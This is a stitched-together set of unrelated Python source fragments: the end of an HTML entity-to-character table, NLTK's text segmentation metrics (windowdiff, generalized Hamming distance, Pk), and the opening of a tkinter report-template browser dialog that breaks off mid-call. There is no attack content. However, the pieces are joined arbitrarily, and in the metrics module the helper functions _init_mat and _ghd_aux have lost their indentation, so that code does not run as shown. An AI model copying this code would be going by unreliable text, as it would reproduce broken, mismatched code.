u'ReverseElement': u'\u220b',
u'ReverseEquilibrium': u'\u21cb',
u'ReverseUpEquilibrium': u'\u296f',
u'rfisht': u'\u297d',
u'rfloor': u'\u230b',
u'Rfr': u'\u211c',
u'rfr': '5\xd8/\xdd'.decode("utf-16-le"),
u'rHar': u'\u2964',
u'rhard': u'\u21c1',
u'rharu': u'\u21c0',
u'rharul': u'\u296c',
u'Rho': u'\u03a1',
u'rho': u'\u03c1',
u'rhov': u'\u03f1',
u'RightAngleBracket': u'\u27e9',
u'RightArrow': u'\u2192',
u'Rightarrow': u'\u21d2',
u'rightarrow': u'\u2192',
u'RightArrowBar': u'\u21e5',
u'RightArrowLeftArrow': u'\u21c4',
u'rightarrowtail': u'\u21a3',
u'RightCeiling': u'\u2309',
u'RightDoubleBracket': u'\u27e7',
u'RightDownTeeVector': u'\u295d',
u'RightDownVector': u'\u21c2',
u'RightDownVectorBar': u'\u2955',
u'RightFloor': u'\u230b',
u'rightharpoondown': u'\u21c1',
u'rightharpoonup': u'\u21c0',
u'rightleftarrows': u'\u21c4',
u'rightleftharpoons': u'\u21cc',
u'rightrightarrows': u'\u21c9',
u'rightsquigarrow': u'\u219d',
u'RightTee': u'\u22a2',
u'RightTeeArrow': u'\u21a6',
u'RightTeeVector': u'\u295b',
u'rightthreetimes': u'\u22cc',
u'RightTriangle': u'\u22b3',
u'RightTriangleBar': u'\u29d0',
u'RightTriangleEqual': u'\u22b5',
u'RightUpDownVector': u'\u294f',
u'RightUpTeeVector': u'\u295c',
u'RightUpVector': u'\u21be',
u'RightUpVectorBar': u'\u2954',
u'RightVector': u'\u21c0',
u'RightVectorBar': u'\u2953',
u'ring': u'\u02da',
u'risingdotseq': u'\u2253',
u'rlarr': u'\u21c4',
u'rlhar': u'\u21cc',
u'rlm': u'\u200f',
u'rmoust': u'\u23b1',
u'rmoustache': u'\u23b1',
u'rnmid': u'\u2aee',
u'roang': u'\u27ed',
u'roarr': u'\u21fe',
u'robrk': u'\u27e7',
u'ropar': u'\u2986',
u'Ropf': u'\u211d',
u'ropf': '5\xd8c\xdd'.decode("utf-16-le"),
u'roplus': u'\u2a2e',
u'rotimes': u'\u2a35',
u'RoundImplies': u'\u2970',
u'rpar': u')',
u'rpargt': u'\u2994',
u'rppolint': u'\u2a12',
u'rrarr': u'\u21c9',
u'Rrightarrow': u'\u21db',
u'rsaquo': u'\u203a',
u'Rscr': u'\u211b',
u'rscr': '5\xd8\xc7\xdc'.decode("utf-16-le"),
u'Rsh': u'\u21b1',
u'rsh': u'\u21b1',
u'rsqb': u']',
u'rsquo': u'\u2019',
u'rsquor': u'\u2019',
u'rthree': u'\u22cc',
u'rtimes': u'\u22ca',
u'rtri': u'\u25b9',
u'rtrie': u'\u22b5',
u'rtrif': u'\u25b8',
u'rtriltri': u'\u29ce',
u'RuleDelayed': u'\u29f4',
u'ruluhar': u'\u2968',
u'rx': u'\u211e',
u'Sacute': u'\u015a',
u'sacute': u'\u015b',
u'sbquo': u'\u201a',
u'Sc': u'\u2abc',
u'sc': u'\u227b',
u'scap': u'\u2ab8',
u'Scaron': u'\u0160',
u'scaron': u'\u0161',
u'sccue': u'\u227d',
u'scE': u'\u2ab4',
u'sce': u'\u2ab0',
u'Scedil': u'\u015e',
u'scedil': u'\u015f',
u'Scirc': u'\u015c',
u'scirc': u'\u015d',
u'scnap': u'\u2aba',
u'scnE': u'\u2ab6',
u'scnsim': u'\u22e9',
u'scpolint': u'\u2a13',
u'scsim': u'\u227f',
u'Scy': u'\u0421',
u'scy': u'\u0441',
u'sdot': u'\u22c5',
u'sdotb': u'\u22a1',
u'sdote': u'\u2a66',
u'searhk': u'\u2925',
u'seArr': u'\u21d8',
u'searr': u'\u2198',
u'searrow': u'\u2198',
u'sect': u'\xa7',
u'semi': u';',
u'seswar': u'\u2929',
u'setminus': u'\u2216',
u'setmn': u'\u2216',
u'sext': u'\u2736',
u'Sfr': '5\xd8\x16\xdd'.decode("utf-16-le"),
u'sfr': '5\xd80\xdd'.decode("utf-16-le"),
u'sfrown': u'\u2322',
u'sharp': u'\u266f',
u'SHCHcy': u'\u0429',
u'shchcy': u'\u0449',
u'SHcy': u'\u0428',
u'shcy': u'\u0448',
u'ShortDownArrow': u'\u2193',
u'ShortLeftArrow': u'\u2190',
u'shortmid': u'\u2223',
u'shortparallel': u'\u2225',
u'ShortRightArrow': u'\u2192',
u'ShortUpArrow': u'\u2191',
u'shy': u'\xad',
u'Sigma': u'\u03a3',
u'sigma': u'\u03c3',
u'sigmaf': u'\u03c2',
u'sigmav': u'\u03c2',
u'sim': u'\u223c',
u'simdot': u'\u2a6a',
u'sime': u'\u2243',
u'simeq': u'\u2243',
u'simg': u'\u2a9e',
u'simgE': u'\u2aa0',
u'siml': u'\u2a9d',
u'simlE': u'\u2a9f',
u'simne': u'\u2246',
u'simplus': u'\u2a24',
u'simrarr': u'\u2972',
u'slarr': u'\u2190',
u'SmallCircle': u'\u2218',
u'smallsetminus': u'\u2216',
u'smashp': u'\u2a33',
u'smeparsl': u'\u29e4',
u'smid': u'\u2223',
u'smile': u'\u2323',
u'smt': u'\u2aaa',
u'smte': u'\u2aac',
u'smtes': u'\u2aac\ufe00',
u'SOFTcy': u'\u042c',
u'softcy': u'\u044c',
u'sol': u'/',
u'solb': u'\u29c4',
u'solbar': u'\u233f',
u'Sopf': '5\xd8J\xdd'.decode("utf-16-le"),
u'sopf': '5\xd8d\xdd'.decode("utf-16-le"),
u'spades': u'\u2660',
u'spadesuit': u'\u2660',
u'spar': u'\u2225',
u'sqcap': u'\u2293',
u'sqcaps': u'\u2293\ufe00',
u'sqcup': u'\u2294',
u'sqcups': u'\u2294\ufe00',
u'Sqrt': u'\u221a',
u'sqsub': u'\u228f',
u'sqsube': u'\u2291',
u'sqsubset': u'\u228f',
u'sqsubseteq': u'\u2291',
u'sqsup': u'\u2290',
u'sqsupe': u'\u2292',
u'sqsupset': u'\u2290',
u'sqsupseteq': u'\u2292',
u'squ': u'\u25a1',
u'Square': u'\u25a1',
u'square': u'\u25a1',
u'SquareIntersection': u'\u2293',
u'SquareSubset': u'\u228f',
u'SquareSubsetEqual': u'\u2291',
u'SquareSuperset': u'\u2290',
u'SquareSupersetEqual': u'\u2292',
u'SquareUnion': u'\u2294',
u'squarf': u'\u25aa',
u'squf': u'\u25aa',
u'srarr': u'\u2192',
u'Sscr': '5\xd8\xae\xdc'.decode("utf-16-le"),
u'sscr': '5\xd8\xc8\xdc'.decode("utf-16-le"),
u'ssetmn': u'\u2216',
u'ssmile': u'\u2323',
u'sstarf': u'\u22c6',
u'Star': u'\u22c6',
u'star': u'\u2606',
u'starf': u'\u2605',
u'straightepsilon': u'\u03f5',
u'straightphi': u'\u03d5',
u'strns': u'\xaf',
u'Sub': u'\u22d0',
u'sub': u'\u2282',
u'subdot': u'\u2abd',
u'subE': u'\u2ac5',
u'sube': u'\u2286',
u'subedot': u'\u2ac3',
u'submult': u'\u2ac1',
u'subnE': u'\u2acb',
u'subne': u'\u228a',
u'subplus': u'\u2abf',
u'subrarr': u'\u2979',
u'Subset': u'\u22d0',
u'subset': u'\u2282',
u'subseteq': u'\u2286',
u'subseteqq': u'\u2ac5',
u'SubsetEqual': u'\u2286',
u'subsetneq': u'\u228a',
u'subsetneqq': u'\u2acb',
u'subsim': u'\u2ac7',
u'subsub': u'\u2ad5',
u'subsup': u'\u2ad3',
u'succ': u'\u227b',
u'succapprox': u'\u2ab8',
u'succcurlyeq': u'\u227d',
u'Succeeds': u'\u227b',
u'SucceedsEqual': u'\u2ab0',
u'SucceedsSlantEqual': u'\u227d',
u'SucceedsTilde': u'\u227f',
u'succeq': u'\u2ab0',
u'succnapprox': u'\u2aba',
u'succneqq': u'\u2ab6',
u'succnsim': u'\u22e9',
u'succsim': u'\u227f',
u'SuchThat': u'\u220b',
u'Sum': u'\u2211',
u'sum': u'\u2211',
u'sung': u'\u266a',
u'sup1': u'\xb9',
u'sup2': u'\xb2',
u'sup3': u'\xb3',
u'Sup': u'\u22d1',
u'sup': u'\u2283',
u'supdot': u'\u2abe',
u'supdsub': u'\u2ad8',
u'supE': u'\u2ac6',
u'supe': u'\u2287',
u'supedot': u'\u2ac4',
u'Superset': u'\u2283',
u'SupersetEqual': u'\u2287',
u'suphsol': u'\u27c9',
u'suphsub': u'\u2ad7',
u'suplarr': u'\u297b',
u'supmult': u'\u2ac2',
u'supnE': u'\u2acc',
u'supne': u'\u228b',
u'supplus': u'\u2ac0',
u'Supset': u'\u22d1',
u'supset': u'\u2283',
u'supseteq': u'\u2287',
u'supseteqq': u'\u2ac6',
u'supsetneq': u'\u228b',
u'supsetneqq': u'\u2acc',
u'supsim': u'\u2ac8',
u'supsub': u'\u2ad4',
u'supsup': u'\u2ad6',
u'swarhk': u'\u2926',
u'swArr': u'\u21d9',
u'swarr': u'\u2199',
u'swarrow': u'\u2199',
u'swnwar': u'\u292a',
u'szlig': u'\xdf',
u'Tab': u'\t',
u'target': u'\u2316',
u'Tau': u'\u03a4',
u'tau': u'\u03c4',
u'tbrk': u'\u23b4',
u'Tcaron': u'\u0164',
u'tcaron': u'\u0165',
u'Tcedil': u'\u0162',
u'tcedil': u'\u0163',
u'Tcy': u'\u0422',
u'tcy': u'\u0442',
u'tdot': u'\u20db',
u'telrec': u'\u2315',
u'Tfr': '5\xd8\x17\xdd'.decode("utf-16-le"),
u'tfr': '5\xd81\xdd'.decode("utf-16-le"),
u'there4': u'\u2234',
u'Therefore': u'\u2234',
u'therefore': u'\u2234',
u'Theta': u'\u0398',
u'theta': u'\u03b8',
u'thetasym': u'\u03d1',
u'thetav': u'\u03d1',
u'thickapprox': u'\u2248',
u'thicksim': u'\u223c',
u'ThickSpace': u'\u205f\u200a',
u'thinsp': u'\u2009',
u'ThinSpace': u'\u2009',
u'thkap': u'\u2248',
u'thksim': u'\u223c',
u'THORN': u'\xde',
u'thorn': u'\xfe',
u'Tilde': u'\u223c',
u'tilde': u'\u02dc',
u'TildeEqual': u'\u2243',
u'TildeFullEqual': u'\u2245',
u'TildeTilde': u'\u2248',
u'times': u'\xd7',
u'timesb': u'\u22a0',
u'timesbar': u'\u2a31',
u'timesd': u'\u2a30',
u'tint': u'\u222d',
u'toea': u'\u2928',
u'top': u'\u22a4',
u'topbot': u'\u2336',
u'topcir': u'\u2af1',
u'Topf': '5\xd8K\xdd'.decode("utf-16-le"),
u'topf': '5\xd8e\xdd'.decode("utf-16-le"),
u'topfork': u'\u2ada',
u'tosa': u'\u2929',
u'tprime': u'\u2034',
u'TRADE': u'\u2122',
u'trade': u'\u2122',
u'triangle': u'\u25b5',
u'triangledown': u'\u25bf',
u'triangleleft': u'\u25c3',
u'trianglelefteq': u'\u22b4',
u'triangleq': u'\u225c',
u'triangleright': u'\u25b9',
u'trianglerighteq': u'\u22b5',
u'tridot': u'\u25ec',
u'trie': u'\u225c',
u'triminus': u'\u2a3a',
u'TripleDot': u'\u20db',
u'triplus': u'\u2a39',
u'trisb': u'\u29cd',
u'tritime': u'\u2a3b',
u'trpezium': u'\u23e2',
u'Tscr': '5\xd8\xaf\xdc'.decode("utf-16-le"),
u'tscr': '5\xd8\xc9\xdc'.decode("utf-16-le"),
u'TScy': u'\u0426',
u'tscy': u'\u0446',
u'TSHcy': u'\u040b',
u'tshcy': u'\u045b',
u'Tstrok': u'\u0166',
u'tstrok': u'\u0167',
u'twixt': u'\u226c',
u'twoheadleftarrow': u'\u219e',
u'twoheadrightarrow': u'\u21a0',
u'Uacute': u'\xda',
u'uacute': u'\xfa',
u'Uarr': u'\u219f',
u'uArr': u'\u21d1',
u'uarr': u'\u2191',
u'Uarrocir': u'\u2949',
u'Ubrcy': u'\u040e',
u'ubrcy': u'\u045e',
u'Ubreve': u'\u016c',
u'ubreve': u'\u016d',
u'Ucirc': u'\xdb',
u'ucirc': u'\xfb',
u'Ucy': u'\u0423',
u'ucy': u'\u0443',
u'udarr': u'\u21c5',
u'Udblac': u'\u0170',
u'udblac': u'\u0171',
u'udhar': u'\u296e',
u'ufisht': u'\u297e',
u'Ufr': '5\xd8\x18\xdd'.decode("utf-16-le"),
u'ufr': '5\xd82\xdd'.decode("utf-16-le"),
u'Ugrave': u'\xd9',
u'ugrave': u'\xf9',
u'uHar': u'\u2963',
u'uharl': u'\u21bf',
u'uharr': u'\u21be',
u'uhblk': u'\u2580',
u'ulcorn': u'\u231c',
u'ulcorner': u'\u231c',
u'ulcrop': u'\u230f',
u'ultri': u'\u25f8',
u'Umacr': u'\u016a',
u'umacr': u'\u016b',
u'uml': u'\xa8',
u'UnderBar': u'_',
u'UnderBrace': u'\u23df',
u'UnderBracket': u'\u23b5',
u'UnderParenthesis': u'\u23dd',
u'Union': u'\u22c3',
u'UnionPlus': u'\u228e',
u'Uogon': u'\u0172',
u'uogon': u'\u0173',
u'Uopf': '5\xd8L\xdd'.decode("utf-16-le"),
u'uopf': '5\xd8f\xdd'.decode("utf-16-le"),
u'UpArrow': u'\u2191',
u'Uparrow': u'\u21d1',
u'uparrow': u'\u2191',
u'UpArrowBar': u'\u2912',
u'UpArrowDownArrow': u'\u21c5',
u'UpDownArrow': u'\u2195',
u'Updownarrow': u'\u21d5',
u'updownarrow': u'\u2195',
u'UpEquilibrium': u'\u296e',
u'upharpoonleft': u'\u21bf',
u'upharpoonright': u'\u21be',
u'uplus': u'\u228e',
u'UpperLeftArrow': u'\u2196',
u'UpperRightArrow': u'\u2197',
u'Upsi': u'\u03d2',
u'upsi': u'\u03c5',
u'upsih': u'\u03d2',
u'Upsilon': u'\u03a5',
u'upsilon': u'\u03c5',
u'UpTee': u'\u22a5',
u'UpTeeArrow': u'\u21a5',
u'upuparrows': u'\u21c8',
u'urcorn': u'\u231d',
u'urcorner': u'\u231d',
u'urcrop': u'\u230e',
u'Uring': u'\u016e',
u'uring': u'\u016f',
u'urtri': u'\u25f9',
u'Uscr': '5\xd8\xb0\xdc'.decode("utf-16-le"),
u'uscr': '5\xd8\xca\xdc'.decode("utf-16-le"),
u'utdot': u'\u22f0',
u'Utilde': u'\u0168',
u'utilde': u'\u0169',
u'utri': u'\u25b5',
u'utrif': u'\u25b4',
u'uuarr': u'\u21c8',
u'Uuml': u'\xdc',
u'uuml': u'\xfc',
u'uwangle': u'\u29a7',
u'vangrt': u'\u299c',
u'varepsilon': u'\u03f5',
u'varkappa': u'\u03f0',
u'varnothing': u'\u2205',
u'varphi': u'\u03d5',
u'varpi': u'\u03d6',
u'varpropto': u'\u221d',
u'vArr': u'\u21d5',
u'varr': u'\u2195',
u'varrho': u'\u03f1',
u'varsigma': u'\u03c2',
u'varsubsetneq': u'\u228a\ufe00',
u'varsubsetneqq': u'\u2acb\ufe00',
u'varsupsetneq': u'\u228b\ufe00',
u'varsupsetneqq': u'\u2acc\ufe00',
u'vartheta': u'\u03d1',
u'vartriangleleft': u'\u22b2',
u'vartriangleright': u'\u22b3',
u'Vbar': u'\u2aeb',
u'vBar': u'\u2ae8',
u'vBarv': u'\u2ae9',
u'Vcy': u'\u0412',
u'vcy': u'\u0432',
u'VDash': u'\u22ab',
u'Vdash': u'\u22a9',
u'vDash': u'\u22a8',
u'vdash': u'\u22a2',
u'Vdashl': u'\u2ae6',
u'Vee': u'\u22c1',
u'vee': u'\u2228',
u'veebar': u'\u22bb',
u'veeeq': u'\u225a',
u'vellip': u'\u22ee',
u'Verbar': u'\u2016',
u'verbar': u'|',
u'Vert': u'\u2016',
u'vert': u'|',
u'VerticalBar': u'\u2223',
u'VerticalLine': u'|',
u'VerticalSeparator': u'\u2758',
u'VerticalTilde': u'\u2240',
u'VeryThinSpace': u'\u200a',
u'Vfr': '5\xd8\x19\xdd'.decode("utf-16-le"),
u'vfr': '5\xd83\xdd'.decode("utf-16-le"),
u'vltri': u'\u22b2',
u'vnsub': u'\u2282\u20d2',
u'vnsup': u'\u2283\u20d2',
u'Vopf': '5\xd8M\xdd'.decode("utf-16-le"),
u'vopf': '5\xd8g\xdd'.decode("utf-16-le"),
u'vprop': u'\u221d',
u'vrtri': u'\u22b3',
u'Vscr': '5\xd8\xb1\xdc'.decode("utf-16-le"),
u'vscr': '5\xd8\xcb\xdc'.decode("utf-16-le"),
u'vsubnE': u'\u2acb\ufe00',
u'vsubne': u'\u228a\ufe00',
u'vsupnE': u'\u2acc\ufe00',
u'vsupne': u'\u228b\ufe00',
u'Vvdash': u'\u22aa',
u'vzigzag': u'\u299a',
u'Wcirc': u'\u0174',
u'wcirc': u'\u0175',
u'wedbar': u'\u2a5f',
u'Wedge': u'\u22c0',
u'wedge': u'\u2227',
u'wedgeq': u'\u2259',
u'weierp': u'\u2118',
u'Wfr': '5\xd8\x1a\xdd'.decode("utf-16-le"),
u'wfr': '5\xd84\xdd'.decode("utf-16-le"),
u'Wopf': '5\xd8N\xdd'.decode("utf-16-le"),
u'wopf': '5\xd8h\xdd'.decode("utf-16-le"),
u'wp': u'\u2118',
u'wr': u'\u2240',
u'wreath': u'\u2240',
u'Wscr': '5\xd8\xb2\xdc'.decode("utf-16-le"),
u'wscr': '5\xd8\xcc\xdc'.decode("utf-16-le"),
u'xcap': u'\u22c2',
u'xcirc': u'\u25ef',
u'xcup': u'\u22c3',
u'xdtri': u'\u25bd',
u'Xfr': '5\xd8\x1b\xdd'.decode("utf-16-le"),
u'xfr': '5\xd85\xdd'.decode("utf-16-le"),
u'xhArr': u'\u27fa',
u'xharr': u'\u27f7',
u'Xi': u'\u039e',
u'xi': u'\u03be',
u'xlArr': u'\u27f8',
u'xlarr': u'\u27f5',
u'xmap': u'\u27fc',
u'xnis': u'\u22fb',
u'xodot': u'\u2a00',
u'Xopf': '5\xd8O\xdd'.decode("utf-16-le"),
u'xopf': '5\xd8i\xdd'.decode("utf-16-le"),
u'xoplus': u'\u2a01',
u'xotime': u'\u2a02',
u'xrArr': u'\u27f9',
u'xrarr': u'\u27f6',
u'Xscr': '5\xd8\xb3\xdc'.decode("utf-16-le"),
u'xscr': '5\xd8\xcd\xdc'.decode("utf-16-le"),
u'xsqcup': u'\u2a06',
u'xuplus': u'\u2a04',
u'xutri': u'\u25b3',
u'xvee': u'\u22c1',
u'xwedge': u'\u22c0',
u'Yacute': u'\xdd',
u'yacute': u'\xfd',
u'YAcy': u'\u042f',
u'yacy': u'\u044f',
u'Ycirc': u'\u0176',
u'ycirc': u'\u0177',
u'Ycy': u'\u042b',
u'ycy': u'\u044b',
u'yen': u'\xa5',
u'Yfr': '5\xd8\x1c\xdd'.decode("utf-16-le"),
u'yfr': '5\xd86\xdd'.decode("utf-16-le"),
u'YIcy': u'\u0407',
u'yicy': u'\u0457',
u'Yopf': '5\xd8P\xdd'.decode("utf-16-le"),
u'yopf': '5\xd8j\xdd'.decode("utf-16-le"),
u'Yscr': '5\xd8\xb4\xdc'.decode("utf-16-le"),
u'yscr': '5\xd8\xce\xdc'.decode("utf-16-le"),
u'YUcy': u'\u042e',
u'yucy': u'\u044e',
u'yuml': u'\xff',
u'Yuml': u'\u0178',
u'Zacute': u'\u0179',
u'zacute': u'\u017a',
u'Zcaron': u'\u017d',
u'zcaron': u'\u017e',
u'Zcy': u'\u0417',
u'zcy': u'\u0437',
u'Zdot': u'\u017b',
u'zdot': u'\u017c',
u'zeetrf': u'\u2128',
u'ZeroWidthSpace': u'\u200b',
u'Zeta': u'\u0396',
u'zeta': u'\u03b6',
u'Zfr': u'\u2128',
u'zfr': '5\xd87\xdd'.decode("utf-16-le"),
u'ZHcy': u'\u0416',
u'zhcy': u'\u0436',
u'zigrarr': u'\u21dd',
u'Zopf': u'\u2124',
u'zopf': '5\xd8k\xdd'.decode("utf-16-le"),
u'Zscr': '5\xd8\xb5\xdc'.decode("utf-16-le"),
u'zscr': '5\xd8\xcf\xdc'.decode("utf-16-le"),
u'zwj': u'\u200d',
u'zwnj': u'\u200c',
}
|
|
# Natural Language Toolkit: Text Segmentation Metrics
#
# Copyright (C) 2001-2012 NLTK Project
# Author: Edward Loper <edloper@gradient.cis.upenn.edu>
# Steven Bird <sb@csse.unimelb.edu.au>
# David Doukhan <david.doukhan@gmail.com>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
Text Segmentation Metrics
1. Windowdiff
Pevzner, L., and Hearst, M., A Critique and Improvement of
an Evaluation Metric for Text Segmentation,
Computational Linguistics 28, 19-36
2. Generalized Hamming Distance
Bookstein A., Kulyukin V.A., Raita T.
Generalized Hamming Distance
Information Retrieval 5, 2002, pp 353-375
Baseline implementation in C++
http://digital.cs.usu.edu/~vkulyukin/vkweb/software/ghd/ghd.html
Study describing benefits of Generalized Hamming Distance Versus
WindowDiff for evaluating text segmentation tasks
Bestgen, Y. Quel indice pour mesurer l'efficacite en segmentation de textes ?
TALN 2009
3. Pk text segmentation metric
Beeferman D., Berger A., Lafferty J. (1999)
Statistical Models for Text Segmentation
Machine Learning, 34, 177-210
"""
import numpy
def windowdiff(seg1, seg2, k, boundary="1"):
    """
    Compute the windowdiff score for a pair of segmentations.  A
    segmentation is any sequence over a vocabulary of two items
    (e.g. "0", "1"), where the specified boundary value is used to
    mark the edge of a segmentation.

    >>> s1 = "00000010000000001000000"
    >>> s2 = "00000001000000010000000"
    >>> s3 = "00010000000000000001000"
    >>> windowdiff(s1, s1, 3)
    0
    >>> windowdiff(s1, s2, 3)
    4
    >>> windowdiff(s2, s3, 3)
    16

    :param seg1: a segmentation
    :type seg1: str or list
    :param seg2: a segmentation
    :type seg2: str or list
    :param k: window width
    :type k: int
    :param boundary: boundary value
    :type boundary: str or int or bool
    :rtype: int
    """
    if len(seg1) != len(seg2):
        raise ValueError("Segmentations have unequal length")
    # Slide a window over both segmentations in lockstep and accumulate
    # the absolute difference in boundary counts at each position.
    return sum(abs(seg1[pos:pos + k + 1].count(boundary) -
                   seg2[pos:pos + k + 1].count(boundary))
               for pos in range(len(seg1) - k))
# Generalized Hamming Distance
def _init_mat(nrows, ncols, ins_cost, del_cost):
mat = numpy.empty((nrows, ncols))
mat[0, :] = [x * ins_cost for x in xrange(ncols)]
mat[:, 0] = [x * del_cost for x in xrange(nrows)]
return mat
def _ghd_aux(mat, rowv, colv, ins_cost, del_cost, shift_cost_coeff):
for i, rowi in enumerate(rowv):
for j, colj in enumerate(colv):
shift_cost = shift_cost_coeff * abs(rowi - colj) + mat[i, j]
if rowi == colj:
# boundaries are at the same location, no transformation required
tcost = mat[i, j]
elif rowi > colj:
# boundary match through a deletion
tcost = del_cost + mat[i, j + 1]
else:
# boundary match through an insertion
tcost = ins_cost + mat[i + 1, j]
mat[i + 1, j + 1] = min(tcost, shift_cost)
def ghd(ref, hyp, ins_cost=2.0, del_cost=2.0, shift_cost_coeff=1.0, boundary='1'):
    """
    Compute the Generalized Hamming Distance for a reference and a hypothetical
    segmentation, corresponding to the cost related to the transformation
    of the hypothetical segmentation into the reference segmentation
    through boundary insertion, deletion and shift operations.

    A segmentation is any sequence over a vocabulary of two items
    (e.g. "0", "1"), where the specified boundary value is used to
    mark the edge of a segmentation.

    Recommended parameter values are a shift_cost_coeff of 2.
    Associated with a ins_cost, and del_cost equal to the mean segment
    length in the reference segmentation.

    >>> # Same examples as Kulyukin C++ implementation
    >>> ghd('1100100000', '1100010000', 1.0, 1.0, 0.5)
    0.5
    >>> ghd('1100100000', '1100000001', 1.0, 1.0, 0.5)
    2.0
    >>> ghd('011', '110', 1.0, 1.0, 0.5)
    1.0
    >>> ghd('1', '0', 1.0, 1.0, 0.5)
    1.0
    >>> ghd('111', '000', 1.0, 1.0, 0.5)
    3.0
    >>> ghd('000', '111', 1.0, 2.0, 0.5)
    6.0

    :param ref: the reference segmentation
    :type ref: str or list
    :param hyp: the hypothetical segmentation
    :type hyp: str or list
    :param ins_cost: insertion cost
    :type ins_cost: float
    :param del_cost: deletion cost
    :type del_cost: float
    :param shift_cost_coeff: constant used to compute the cost of a shift.
        shift cost = shift_cost_coeff * |i - j| where i and j are
        the positions indicating the shift
    :type shift_cost_coeff: float
    :param boundary: boundary value
    :type boundary: str or int or bool
    :rtype: float
    """
    ref_idx = [pos for pos, item in enumerate(ref) if item == boundary]
    hyp_idx = [pos for pos, item in enumerate(hyp) if item == boundary]

    # Degenerate cases: one (or both) segmentations have no boundaries,
    # so the cost is a pure run of insertions or deletions.
    if not ref_idx and not hyp_idx:
        return 0.0
    if ref_idx and not hyp_idx:
        return len(ref_idx) * ins_cost
    if hyp_idx and not ref_idx:
        return len(hyp_idx) * del_cost

    # General case: dynamic program over boundary positions.
    mat = _init_mat(len(hyp_idx) + 1, len(ref_idx) + 1, ins_cost, del_cost)
    _ghd_aux(mat, hyp_idx, ref_idx, ins_cost, del_cost, shift_cost_coeff)
    return mat[-1, -1]
# Beeferman's Pk text segmentation evaluation metric
def pk(ref, hyp, k=None, boundary='1'):
    """
    Compute the Pk metric for a pair of segmentations.  A segmentation
    is any sequence over a vocabulary of two items (e.g. "0", "1"),
    where the specified boundary value is used to mark the edge of a
    segmentation.

    >>> s1 = "00000010000000001000000"
    >>> s2 = "00000001000000010000000"
    >>> s3 = "00010000000000000001000"
    >>> pk(s1, s1, 3)
    0.0
    >>> pk(s1, s2, 3)
    0.095238...
    >>> pk(s2, s3, 3)
    0.190476...

    :param ref: the reference segmentation
    :type ref: str or list
    :param hyp: the segmentation to evaluate
    :type hyp: str or list
    :param k: window size, if None, set to half of the average reference segment length
    :type k: int
    :param boundary: boundary value
    :type boundary: str or int or bool
    :rtype: float
    """
    if k is None:
        # Default window: half of the average reference segment length.
        k = int(round(len(ref) / (ref.count(boundary) * 2.)))

    n_considered_seg = len(ref) - k + 1
    n_same_ref = 0.0
    n_false_alarm = 0.0
    n_miss = 0.0
    # range() replaces the Python-2-only xrange(); behavior is unchanged.
    for i in range(n_considered_seg):
        # A window "agrees" when no boundary falls strictly inside it.
        bsame_ref_seg = boundary not in ref[(i + 1):(i + k)]
        bsame_hyp_seg = boundary not in hyp[(i + 1):(i + k)]
        if bsame_ref_seg:
            n_same_ref += 1.0
        if bsame_hyp_seg and not bsame_ref_seg:
            # Hypothesis missed a reference boundary in this window.
            n_miss += 1
        if bsame_ref_seg and not bsame_hyp_seg:
            # Hypothesis inserted a spurious boundary in this window.
            n_false_alarm += 1

    prob_same_ref = n_same_ref / n_considered_seg
    prob_diff_ref = 1 - prob_same_ref
    prob_miss = n_miss / n_considered_seg
    prob_false_alarm = n_false_alarm / n_considered_seg
    return prob_miss * prob_diff_ref + prob_false_alarm * prob_same_ref
if __name__ == "__main__":
    # Run the embedded doctests when executed as a script.
    import doctest
    flags = doctest.NORMALIZE_WHITESPACE
    doctest.testmod(optionflags=flags)
|
|
####################################################################################################
# The MIT License (MIT)
#
# Copyright (c) 2015, Alexander I. Mykyta
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
####################################################################################################
import copy
import re
import glob
import os
import fnmatch
import logging
import tkinter as tk
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from .python_modules import tk_extensions as tkext
from . import form_data
from . import report_template
from . import report_entries
log = logging.getLogger("gui")
def trim_path(path, maxlen):
    """Shorten *path* to at most *maxlen* characters for display.

    Paths that already fit are returned unchanged; longer ones keep
    their tail and get a "..." prefix.
    """
    if len(path) > maxlen:
        # keep the last maxlen-3 characters and prepend the ellipsis
        return "..." + path[3 - maxlen:]
    return path
####################################################################################################
# GUI Windows
####################################################################################################
class TemplateBrowser(tkext.Dialog):
    """
    Modal dialog that lists the available report templates and lets the
    user create, edit, copy, delete, or select one.

    The chosen template (if any) is exposed via ``self.selected_template``
    after the dialog closes; ``self.templates`` is mutated in place as
    templates are added/edited/removed.
    """

    #---------------------------------------------------------------
    # Widgets
    #---------------------------------------------------------------
    def create_body(self, master_fr):
        """Build the dialog body: template list + description box on the
        left, action buttons on the right."""

        #--------------------------------------------------------
        # Template list and Description container frame
        template_area_fr = ttk.Frame(
            master_fr,
            padding=3
        )
        template_area_fr.pack(
            side = tk.LEFT,
            fill=tk.BOTH,
            expand = True
        )

        # Description box
        desc_fr = ttk.Labelframe(
            template_area_fr,
            text="Description",
            padding=3
        )
        desc_fr.pack(side = tk.BOTTOM, fill = tk.X)

        self.txt_desc = tk.Text(
            desc_fr,
            wrap = tk.WORD,
            width = 50,
            height = 5
        )
        self.txt_desc.pack(
            fill = tk.X,
            expand = True
        )
        # Read-only; re-enabled temporarily in set_desc_text() for updates.
        self.txt_desc.configure(state=tk.DISABLED)

        # Template List
        self.rt_list = tk.Listbox(
            template_area_fr,
            highlightthickness = 0,
            selectmode = "single",
            exportselection = False,
            activestyle = "none"
        )
        self.rt_list.bind('<<ListboxSelect>>', self.ev_rt_list_Select)
        self.rt_list.bind("<Double-Button-1>", self.ev_rt_list_DoubleClick)
        self.rt_list.pack(
            side = tk.LEFT,
            fill = tk.BOTH,
